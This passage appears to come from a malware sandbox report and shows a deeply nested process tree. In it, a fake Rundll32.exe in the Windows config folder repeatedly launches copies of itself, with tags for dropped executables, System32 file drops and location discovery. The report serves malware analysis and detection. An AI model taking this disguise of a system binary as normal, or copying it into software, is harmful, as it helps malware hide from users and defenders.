- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4516 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"25⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5328 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"26⤵
- Executes dropped EXE
PID:1652 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"27⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4300 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2716 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"29⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5460 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"30⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5508 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"31⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5404 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"32⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3748 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"33⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3228 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"34⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5912 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"35⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4788 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"36⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3876 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"37⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:912 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"38⤵
- Checks computer location settings
- Executes dropped EXE
PID:3152 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"39⤵
- Checks computer location settings
- Executes dropped EXE
PID:2444 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"40⤵
- Executes dropped EXE
PID:1624 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"41⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:660 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"42⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:2852 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"43⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1800 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"44⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3908 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"45⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:5528 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"46⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:3812 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"47⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
PID:1524 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"48⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4496 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"49⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3700 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"50⤵
- Checks computer location settings
- Executes dropped EXE
PID:5052 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"51⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5284 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"52⤵PID:3748
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"53⤵
- System Location Discovery: System Language Discovery
PID:608 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"54⤵
- Drops file in System32 directory
PID:4960 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"55⤵
- Drops file in System32 directory
PID:5268 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"56⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5684 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"57⤵
- Checks computer location settings
- Drops file in System32 directory
PID:1892 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"58⤵PID:1040
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"59⤵
- Checks computer location settings
- Drops file in System32 directory
PID:5856 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"60⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:828 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"61⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5596 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"62⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1212 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"63⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1184 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"64⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2612 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"65⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2964 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"66⤵
- System Location Discovery: System Language Discovery
PID:4908 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"67⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1668 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"68⤵
- Checks computer location settings
- Drops file in System32 directory
PID:2404 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"69⤵
- Drops file in System32 directory
PID:6012 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"70⤵PID:3888
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"71⤵
- Checks computer location settings
- Drops file in System32 directory
PID:4688 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"72⤵
- Checks computer location settings
PID:3228 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"73⤵
- Checks computer location settings
- Drops file in System32 directory
PID:512 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"74⤵
- System Location Discovery: System Language Discovery
PID:3920 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"75⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"76⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1352 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"77⤵
- Checks computer location settings
- Drops file in System32 directory
PID:5900 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"78⤵
- Drops file in System32 directory
PID:4456 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"79⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4988 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"80⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1104 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"81⤵
- Checks computer location settings
- Drops file in System32 directory
PID:2224 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"82⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:868 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"83⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:2676 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"84⤵
- Checks computer location settings
- Drops file in System32 directory
PID:1936 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"85⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3464 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"86⤵
- Checks computer location settings
- Drops file in System32 directory
PID:1652 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"87⤵
- Checks computer location settings
- Drops file in System32 directory
PID:1048 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"88⤵
- Checks computer location settings
- Drops file in System32 directory
PID:4488 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"89⤵
- System Location Discovery: System Language Discovery
PID:2384 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"90⤵
- Checks computer location settings
- Drops file in System32 directory
PID:6048 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"91⤵
- Checks computer location settings
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:4580 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"92⤵
- Checks computer location settings
PID:2968 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"93⤵
- Checks computer location settings
- Drops file in System32 directory
PID:4404 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"94⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5972 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"95⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"96⤵PID:3920
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"97⤵PID:912
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"98⤵PID:4284
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"99⤵PID:2208
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"100⤵PID:4752
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"101⤵PID:1056
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"102⤵PID:2236
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"103⤵PID:1212
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"104⤵PID:5756
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"105⤵PID:3812
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"106⤵PID:4300
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"107⤵PID:2600
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"108⤵PID:4336
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"109⤵PID:5852
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"110⤵PID:2900
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"111⤵PID:3212
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"112⤵PID:3400
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"113⤵PID:5720
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"114⤵PID:5068
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"115⤵PID:4604
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"116⤵PID:436
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"117⤵PID:5856
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"118⤵PID:1224
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"119⤵PID:4964
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"120⤵PID:5204
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"121⤵PID:972
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"122⤵PID:1056
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-